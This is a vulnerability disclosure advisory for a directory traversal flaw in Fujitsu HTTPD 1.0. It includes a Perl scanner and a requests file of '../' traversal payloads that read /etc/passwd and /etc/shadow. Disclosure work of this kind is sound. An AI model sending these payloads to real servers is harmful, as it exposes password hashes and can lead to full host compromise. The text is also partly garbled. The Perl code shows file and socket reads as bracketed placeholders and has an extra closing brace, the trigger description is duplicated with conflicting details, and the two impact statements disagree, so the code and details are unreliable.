Tried, Tested and Proven

Security Advisory 06 – 010 – Directory Traversal Vulnerability

Vulnerable System:

Fujitsu/HTTPD ver1.0

Vulnerability discovery and development:

Paul Docherty

Affected Systems:

Fujitsu HTTPD Server Version 1.0

Details:

The Fujitsu web server is part of a system managment suite of products which is designed to allow network based management of the host the server resides on. By sending a specially crafted http request to the server it is possible to retrieve the source code of CGI scripts on the vulnerable server.

The request that triggers this issue consists of sending a sequence of “change directory” characters that are not terminated with the final slash (/) an example of this being; by default the system loads the CGI script, top.cgi which in turn goes off and loads other java based code, in order to view the source code of the top.cgi script make a request for /../.. Additionally only HTTP/1.1 requests with a qualified Host: header trigger the issue.

The request that triggers this issue consists of a named directory followed by 15 (this has proved the most reliabe number) ../ requests, additionally only HTTP/1.1 requests with a qualified Host: header trigger the issue.

Portcullis have verified the following two directory names as triggers for the issue:

/Admin/../../../../../../../../../../../../../../../etc/passwd

/Guest/../../../../../../../../../../../../../../../etc/passwd

Impact:

An attacker can request and view any file which resides on the system that the web server process user has privileges to read. In instances (default) where the web server is running as root any file can be read. This can lead to a complete compromise of the host.

Exploit:

Portcullis have developed a utility to identify this vulnerability. See Below.

--------------------------------------- PERL CODE CUT HERE -----------------------------------

#!/usr/bin/perl -w

# This Script was created to verify the existence of the issues highlighted by

# Portcullis Advisories 06-010 and 06-011. As the Fujitsu/HTTPD Ver1.0 Server,

# typically runs on a port other than 80 you need to specify the

# port on the command line.

#

#

# USAGE fujihttp.pl -h the FQHN or IP -p port -r file of requests

#

# Paul Docherty - pjd@portcullis-security.com

#

use IO::Socket;

use Getopt::Std;

getopt ("h: p: r: ");

use vars qw( $opt_h $opt_p $opt_r);

if ((! $opt_h) || (! $opt_p) || (! $opt_r)) {

print "\nUSAGE: fujihttp.pl -h [IP] -p [port] -r [request file ]\n ";

print "\nExample: perl ./fujihttp.pl -h 10.20.30.40 -p 80 -r requests\n\n";

exit 1;

};

$host = $opt_h;

$port = $opt_p;

$request = $opt_r;

$string = "HTTP/1.0 200 OK"; # Obviuosly you can change this to suit your needs!!

open (LIST, "$request") or die "Unable to open $request ....\n\n $!";

&connect;

exit 0;

sub connect {

foreach $request ([LIST]) {

$connection = IO::Socket::INET->new (

Proto => "tcp",

PeerAddr => "$host",

PeerPort => "$port",

) or die "Can't CONNECT to $host on the Port specified.\n $!";

$connection -> autoflush;

chomp $request;

print $connection "$request\n Host: localhost\r\n\r\n";

$results = [$connection];

if ( $results =~/($string)/g ) {

print "$host\n";

print "$1 This Server appears Vulnerable:\n";

};

}

close ($connection);

#sleep 3;

}

}

--------------------------------------- PERL CODE ENDS CUT HERE -----------------------------

This is the requests file referenced above.

--------------------------------------- REQUESTS.TXT CUT HERE -------------------------------

GET /Guide/../../../../../../../../../../../../../../../etc/passwd HTTP/1.1

GET /Guide/../../../../../../../../../../../../../../../etc/shadow HTTP/1.1

GET /Admin/../../../../../../../../../../../../../../../etc/passwd HTTP/1.1

GET /Admin/../../../../../../../../../../../../../../../etc/shadow HTTP/1.1

GET /../.. HTTP/1.1

GET /KNOWN-APP-DIR/../.. HTTP/1.1

--------------------------------------- REQUESTS.TXT ENDS CUT HERE ---------------------------
Impact:

An attacker can request and view the source code of CGI scripts on the vulnerable server.

Vendor Status:

Notified via email 2 November 2005

Notified (2) via email 17 February 2006

Notified (3) via email 17 April 2006

Notified (4) via email 30 June 2006

Copyright:

Copyright © Portcullis Computer Security Limited 2006, All rights reserved worldwide.
Permission is hereby granted for the electronic redistribution of this information.
It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:

The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.